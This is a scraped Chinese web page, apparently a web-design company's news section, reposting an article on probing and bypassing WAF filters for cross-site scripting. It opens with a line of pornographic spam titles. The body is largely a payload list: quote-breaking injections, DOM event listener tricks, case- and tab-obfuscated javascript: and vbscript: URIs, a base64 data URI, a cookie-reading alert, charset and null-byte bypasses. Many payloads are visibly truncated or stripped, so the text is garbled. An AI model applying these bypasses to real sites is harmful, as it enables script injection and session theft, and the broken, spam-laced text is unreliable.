日韩无码专区无码一级三级片|91人人爱网站中日韩无码电影|厨房大战丰满熟妇|AV高清无码在线免费观看|另类AV日韩少妇熟女|中文日本大黄一级黄色片|色情在线视频免费|亚洲成人特黄a片|黄片wwwav色图欧美|欧亚乱色一区二区三区

RELATEED CONSULTING
相關(guān)咨詢
選擇下列產(chǎn)品馬上在線溝通
服務(wù)時(shí)間:8:30-17:00
你可能遇到了下面的問題
關(guān)閉右側(cè)工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營銷解決方案
XSS現(xiàn)代WAF規(guī)則探測(cè)及繞過技術(shù)

初始測(cè)試

創(chuàng)新新互聯(lián),憑借10余年的成都網(wǎng)站制作、成都做網(wǎng)站、外貿(mào)營銷網(wǎng)站建設(shè)經(jīng)驗(yàn),本著真心·誠心服務(wù)的企業(yè)理念服務(wù)于成都中小企業(yè)設(shè)計(jì)網(wǎng)站有成百上千家案例。做網(wǎng)站建設(shè),選創(chuàng)新互聯(lián)。

1、使用無害的payload,類似,,觀察響應(yīng),判斷應(yīng)用程序是否被HTML編碼,是否標(biāo)簽被過濾,是否過濾<>等等;
2、如果過濾閉合標(biāo)簽,嘗試無閉合標(biāo)簽的payload(
1、如果大小寫不行的話,      // Works With All Browsers
( is html encoded to (
) is html encoded to )

Opera的變量


通常,我們使用“>,閉合前面的標(biāo)簽,然而在這種情況,我們也可以直接輸入執(zhí)行腳本alert(), prompt()
confirm() ,例如:
“;alert(1)//

非常規(guī)事件監(jiān)聽

DOMfocusin,DOMfocusout,等事件,這些需要特定的事件監(jiān)聽適當(dāng)?shù)膱?zhí)行。例如:

";document.body.addEventListener("DOMActivate",alert(1))//
";document.body.addEventListener("DOMActivate",prompt(1))//
";document.body.addEventListener("DOMActivate",confirm(1))//

此類事件的列表

DOMAttrModified
DOMCharacterDataModified
DOMFocusIn
DOMFocusOut
DOMMouseScroll
DOMNodeInserted
DOMNodeInsertedIntoDocument
DOMNodeRemoved
DOMNodeRemovedFromDocument
DOMSubtreeModified

超文本內(nèi)容

代碼中的情況如下

Click
可以使用javascript:alert(1)//直接執(zhí)行Click

變形

主要包含大小寫和JavaScript變形

javascript:alert(1)
javaSCRIPT:alert(1)
JaVaScRipT:alert(1)
javas	cript:\u0061lert(1);
javascript:\u0061lert(1)
javascript:alert(document.cookie)      // AsharJaved

IE10以下和URI中可以使用VBScript

vbscript:alert(1);
vbscript:alert(1);
vbscr	ipt:alert(1)"

Data URl

data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==

JSON內(nèi)容

反射輸入

encodeURIComponent('userinput')

可以使用

-alert(1)-
-prompt(1)-
-confirm(1)-

結(jié)果

encodeURIComponent(''-alert(1)-'')
encodeURIComponent(''-prompt(1)-'')

輸入反射在svg標(biāo)簽內(nèi)

源碼如下:

可以輸入

www.site.com/test.php?var=text”;alert(1)//

如果系統(tǒng)編碼了”字符

原因是引入了附加的(XML)到HTML內(nèi)容里,可以使用2次編碼處理

#p#瀏覽器BUG

字符集BUG

字符集BUG在IE中很普遍,最早的bug是UTF-7。如果能控制字符集編碼,我們可以繞過99% 的WAF過濾。

示例

http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v=XSS

可以控制編碼,提交

http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v=”>

可以修改為UTF-32編碼形式

???script?alert(1)?/script?
http://xsst.sinaapp.com/utf-32-1.php?charset=utf-32&v=%E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80alert(1)%E3%B0%80/script%E3%B8%80

空字節(jié)

最長(zhǎng)用來繞過mod_security防火墻,形式如下:

alert(1);
alert(1);
confirm(0);

空字節(jié)只適用于PHP 5.3.8以上的版本

語法BUG

RFC聲明中節(jié)點(diǎn)名稱不能是空格,以下的形式在javascript中不能運(yùn)行


<%0ascript>alert(1);
<%0bscript>alert(1);
<%, 

 // Works upto IE7
參考http://html5sec.org/#71